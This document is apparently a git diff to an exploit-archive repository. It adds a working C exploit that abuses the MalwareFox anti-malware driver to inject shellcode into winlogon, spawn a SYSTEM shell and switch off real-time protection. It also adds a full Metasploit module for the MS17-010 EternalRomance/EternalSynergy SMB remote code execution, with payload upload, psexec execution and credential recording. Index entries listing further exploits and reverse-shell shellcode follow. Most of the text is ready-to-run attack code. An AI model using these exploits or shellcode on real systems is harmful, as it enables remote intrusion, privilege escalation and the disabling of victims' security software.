02/02/2018 +Author : Souhail Hammou +Vendor Homepage : https://www.malwarefox.com/ +Version : 2.74.0.150 +Tested on : Windows 7 32-bit / Windows 10 64-bit +CVE : CVE-2018-6593 +*/ +#include +#include +#include +#include + +#pragma comment(lib,"FltLib.lib") + +BOOL RegisterProcessByCommunicationPort() +{ + HRESULT hResult; + HANDLE hPort; + + /* + Improper access control : + The default DACL for the filter communication port is superseded allowing everyone to connect to the port: + + .text:0000000140011987 lea rcx, [rbp+SecurityDescriptor] + .text:000000014001198B mov edx, 1F0001h + .text:0000000140011990 call FltBuildDefaultSecurityDescriptor ;default SD only allows SYSTEM & Admins to connect + .text:0000000140011995 test eax, eax + + [.........] + + .text:00000001400119B1 + .text:00000001400119B1 loc_1400119B1: ; CODE XREF: sub_140011890+107j + .text:00000001400119B1 mov rcx, [rbp+SecurityDescriptor] ; SecurityDescriptor + .text:00000001400119B5 xor r9d, r9d ; DaclDefaulted + .text:00000001400119B8 xor r8d, r8d ; Dacl + .text:00000001400119BB mov dl, 1 ; DaclPresent + .text:00000001400119BD call cs:RtlSetDaclSecurityDescriptor ; <= Vuln: SD's DACL pointer is set to NULL, granting access to everyone + + Once connected to the port, the driver automatically registers the process + as trusted. This allows the process to issue IOCTL codes that couldn't be sent otherwise. + e.g. disable real-time protection, write to raw disk, open full access handles to processes ...etc + */ + + hResult = FilterConnectCommunicationPort( + L"\\GLOBAL??\\ZAM_MiniFilter_CommPort", + 0, + NULL, + 0, + NULL, + &hPort); + + if (hResult != S_OK) + { + return FALSE; + } + CloseHandle(hPort); + return TRUE; +} + +DWORD GetWinlogonPID() +{ + DWORD WinlogonPid = 0; + PROCESSENTRY32 ProcessEntry; + ProcessEntry.dwSize = sizeof(PROCESSENTRY32); + + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hSnapshot == INVALID_HANDLE_VALUE) + { + printf("[-] CreateToolhelp32Snapshot failed !\n"); + goto ret; + } + + if (!Process32First(hSnapshot, &ProcessEntry)) + { + printf("[-] Process32First failed !\n"); + goto cleanup; + } + + do + { + if (!lstrcmp(ProcessEntry.szExeFile, "winlogon.exe")) + { + WinlogonPid = ProcessEntry.th32ProcessID; + break; + } + } while (Process32Next(hSnapshot, &ProcessEntry)); + +cleanup: + CloseHandle(hSnapshot); +ret: + return WinlogonPid; +} +int main(int argc, char** argv) +{ + DWORD BytesReturned; + DWORD winlogon_pid; + HANDLE winlogon_handle; + LPVOID RemoteAllocation; + HANDLE hDevice; + + printf("=== MalwareFox Anti-Malware 2.74.0.150 zam64.sys Local Privilege Escalation ===\n"); + printf(" Tested on Windows 10 64-bit \n"); + printf(" Souhail Hammou \n\n"); + printf("[*] Stage 1: Registering the process with the driver by connecting to the minifilter communication port\n"); + + hDevice = CreateFile + ("\\\\.\\ZemanaAntiMalware", + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + { + return 0; + } + + + if (!RegisterProcessByCommunicationPort()) + { + printf("\t[-] Registration Failed !\n"); + return 0; + } + + printf("\t[+] Process registered.\n[*] Stage 2: \n"); + + printf("\t[+] Getting Winlogon's PID\n"); + winlogon_pid = GetWinlogonPID(); + + if (!winlogon_pid) + { + printf("\t[-] GetWinlogonPID() failed !\n"); + return 0; + } + + printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n"); + + /* + The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process. + We use this IOCTL to open a full access handle to winlogon.exe. + Note that this IOCTL can only be sent if the process is registered with the driver. + */ + if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL)) + { + printf("\t[-] DeviceIoControl 0x8000204C failed !\n"); + return 0; + } + + printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n"); + + if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE))) + { + printf("\t[-] VirtualAllocEx failed !\n"); + return 0; + } + + printf("\t[+] Writing shellcode to allocated memory\n"); + + /*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/ + unsigned char buf[] = + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" + "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" + "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" + "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" + "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" + "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" + "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" + "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" + "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" + "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" + "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" + "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" + "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" + "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" + "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" + "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" + "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" + "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" + "\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"; + + if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned)) + { + printf("\t[-] WriteProcessMemory Failed !\n"); + return 0; + } + + printf("\t[+] Spawning SYSTEM shell\n"); + if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL)) + { + printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n"); + return 0; + } + + printf("[*] Bonus:\n\t[+] Disabling real-time protection\n"); + if (!DeviceIoControl(hDevice, 0x80002090, NULL, 0, NULL, 0, &BytesReturned, NULL)) + { + printf("\t[-] DeviceIoControl 0x80002090 failed !\n"); + return 0; + } + printf("\t[+] RT protection disabled."); + return 0; +} \ No newline at end of file diff --git a/exploits/windows/remote/43970.rb b/exploits/windows/remote/43970.rb new file mode 100755 index 000000000..4cab115f7 --- /dev/null +++ b/exploits/windows/remote/43970.rb @@ -0,0 +1,339 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +# Windows XP systems that are not part of a domain default to treating all +# network logons as if they were Guest. This prevents SMB relay attacks from +# gaining administrative access to these systems. This setting can be found +# under: +# +# Local Security Settings > +# Local Policies > +# Security Options > +# Network Access: Sharing and security model for local accounts + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010 + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution', + 'Description' => %q{ + This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where + primitive. This will then be used to overwrite the connection session information with as an + Administrator session. From there, the normal psexec payload code execution is done. + + Exploits a type confusion between Transaction and WriteAndX requests and a race condition in + Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy + exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a + named pipe. + }, + 'Author' => + [ + 'sleepya', # zzz_exploit idea and offsets + 'zerosum0x0', + 'Shadow Brokers', + 'Equation Group' + ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'thread' + }, + 'References' => + [ + [ 'AKA', 'ETERNALSYNERGY' ], + [ 'AKA', 'ETERNALROMANCE' ], + [ 'AKA', 'ETERNALCHAMPION' ], + [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred + [ 'MSB', 'MS17-010' ], + [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests + [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests + [ 'CVE', '2017-0147'], # for EternalRomance reference + [ 'URL', 'https://github.com/worawit/MS17-010' ], + [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], + [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], + ], + 'Payload' => + { + 'Space' => 3072, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'PowerShell', { } ], + [ 'Native upload', { } ], + [ 'MOF upload', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 14 2017' + )) + + register_options( + [ + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) + ]) + + register_advanced_options( + [ + OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]), + OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]), + OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']), + OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil]) + ]) + end + + def exploit + begin + eternal_pwn(datastore['RHOST']) + smb_pwn() + + rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e + print_error("#{e.message}") + rescue ::Errno::ECONNRESET, + ::Rex::Proto::SMB::Exceptions::LoginError, + ::Rex::HostUnreachable, + ::Rex::ConnectionTimeout, + ::Rex::ConnectionRefused => e + print_error("#{e.class}: #{e.message}") + rescue => error + print_error(error.class.to_s) + print_error(error.message) + print_error(error.backtrace.join("\n")) + ensure + eternal_cleanup() # restore session + end + end + + def smb_pwn() + case target.name + when 'Automatic' + if powershell_installed? + print_status('Selecting PowerShell target') + powershell + else + print_status('Selecting native target') + native_upload + end + when 'PowerShell' + powershell + when 'Native upload' + native_upload + when 'MOF upload' + mof_upload + end + + handler + end + + + # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to + # be moved into a mixin + + def powershell_installed? + share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}" + + case datastore['SHARE'].upcase + when 'ADMIN$' + path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe' + when 'C$' + path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' + else + path = datastore['PSH_PATH'] + end + + simple.connect(share) + + vprint_status("Checking for #{path}") + + if smb_file_exist?(path) + vprint_status('PowerShell found') + psh = true + else + vprint_status('PowerShell not found') + psh = false + end + + simple.disconnect(share) + + psh + end + + def powershell + ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME'] + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) + + if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] + print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") + end + + # Execute the powershell command + print_status("Executing the payload...") + begin + psexec(command) + rescue StandardError => exec_command_error + fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") + end + end + + def native_upload + filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" + servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) + serviceencoder = datastore['SERVICE_STUB_ENCODER'] || '' + + # Upload the shellcode to a file + print_status("Uploading payload...") + smbshare = datastore['SHARE'] + fileprefix = "" + # if SHARE = Users/sasha/ or something like this + if smbshare =~ /.[\\\/]/ + subfolder = true + smbshare = datastore['SHARE'].dup + smbshare = smbshare.gsub(/^[\\\/]/,"") + folder_list = smbshare.split(/[\\\/]/) + smbshare = folder_list[0] + fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1 + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct') + else + subfolder = false + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + fd = smb_open("\\#{filename}", 'rwct') + end + exe = '' + opts = { :servicename => servicename, :serviceencoder => serviceencoder} + begin + exe = generate_payload_exe_service(opts) + + fd << exe + ensure + fd.close + end + + if subfolder + print_status("Created \\#{fileprefix}\\#{filename}...") + else + print_status("Created \\#{filename}...") + end + + # Disconnect from the share + simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}") + + # define the file location + if datastore['SHARE'] == 'ADMIN$' + file_location = "%SYSTEMROOT%\\#{filename}" + elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/ + file_location = datastore['SHARE'].slice(0,1) + ":\\#{filename}" + else + file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}" + end + + psexec(file_location, false) + + unless datastore['SERVICE_PERSIST'] + print_status("Deleting \\#{filename}...") + #This is not really useful but will prevent double \\ on the wire :) + if datastore['SHARE'] =~ /.[\\\/]/ + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + begin + simple.delete("\\#{fileprefix}\\#{filename}") + rescue XCEPT::ErrorCode => e + print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}") + end + else + simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}") + begin + simple.delete("\\#{filename}") + rescue XCEPT::ErrorCode => e + print_error("Delete of \\#{filename} failed: #{e.message}") + end + end + end + end + + def mof_upload + share = "\\\\#{datastore['RHOST']}\\ADMIN$" + filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe" + + # payload as exe + print_status("Trying wbemexec...") + print_status("Uploading Payload...") + if datastore['SHARE'] != 'ADMIN$' + print_error('Wbem will only work with ADMIN$ share') + return + end + simple.connect(share) + exe = generate_payload_exe + fd = smb_open("\\system32\\#{filename}", 'rwct') + fd << exe + fd.close + print_status("Created %SystemRoot%\\system32\\#{filename}") + + # mof to cause execution of above + mofname = rand_text_alphanumeric(14) + ".MOF" + mof = generate_mof(mofname, filename) + print_status("Uploading MOF...") + fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct') + fd << mof + fd.close + print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}") + + # Disconnect from the ADMIN$ + simple.disconnect(share) + end + + def report_auth + service_data = { + address: ::Rex::Socket.getaddress(datastore['RHOST'],true), + port: datastore['RPORT'], + service_name: 'smb', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: self.fullname, + private_data: datastore['SMBPass'], + username: datastore['SMBUser'].downcase + } + + if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' + credential_data.merge!({ + realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, + realm_value: datastore['SMBDomain'] + }) + end + + if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ + credential_data.merge!({:private_type => :ntlm_hash}) + else + credential_data.merge!({:private_type => :password}) + end + + credential_data.merge!(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + access_level: 'Admin', + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + } + + login_data.merge!(service_data) + create_credential_login(login_data) + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 624054667..c7a469a0a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5485,6 +5485,9 @@ id,file,description,date,author,type,platform,port 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows, 43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, 43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple, +43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, +42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows, +43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -9308,6 +9311,9 @@ id,file,description,date,author,type,platform,port 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows, 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux, 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows, +43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux, +43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows, +43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Buffer Overflow",2018-02-05,"Juan Sacco",local,linux, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, @@ -15982,6 +15988,7 @@ id,file,description,date,author,type,platform,port 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows, 43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows, 43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple, +43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 @@ -37970,6 +37977,18 @@ id,file,description,date,author,type,platform,port 43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php, 43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple, 43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware, +43963,exploits/php/webapps/43963.txt,"Wonder CMS 2.3.1 - Unrestricted File Upload",2018-02-05,"Samrat Das",webapps,php, +43964,exploits/php/webapps/43964.txt,"Wonder CMS 2.3.1 - 'Host' Header Injection",2018-02-05,"Samrat Das",webapps,php, +43965,exploits/php/webapps/43965.txt,"Matrimonial Website Script 2.1.6 - 'uid' SQL Injection",2018-02-05,L0RD,webapps,php, +43966,exploits/php/webapps/43966.txt,"NixCMS 1.0 - 'category_id' SQL Injection",2018-02-05,"Bora Bozdogan",webapps,php, +43967,exploits/php/webapps/43967.py,"Online Voting System - Authentication Bypass",2018-02-05,"Giulio Comi",webapps,php, +43974,exploits/php/webapps/43974.txt,"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php, +43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php, +43976,exploits/php/webapps/43976.txt,"Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php, +43977,exploits/php/webapps/43977.php,"Joomla! Component jLike 1.0 - Information Leak",2018-02-05,"Ihsan Sencan",webapps,php, +43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php, +43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php, +43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 4a79e9ef8..ef35c6e22 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -837,7 +837,7 @@ id,file,description,date,author,type,platform 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86 43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm -43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2018-11-09,0x4ndr3,shellcode,linux_x86-64 +43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64 43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64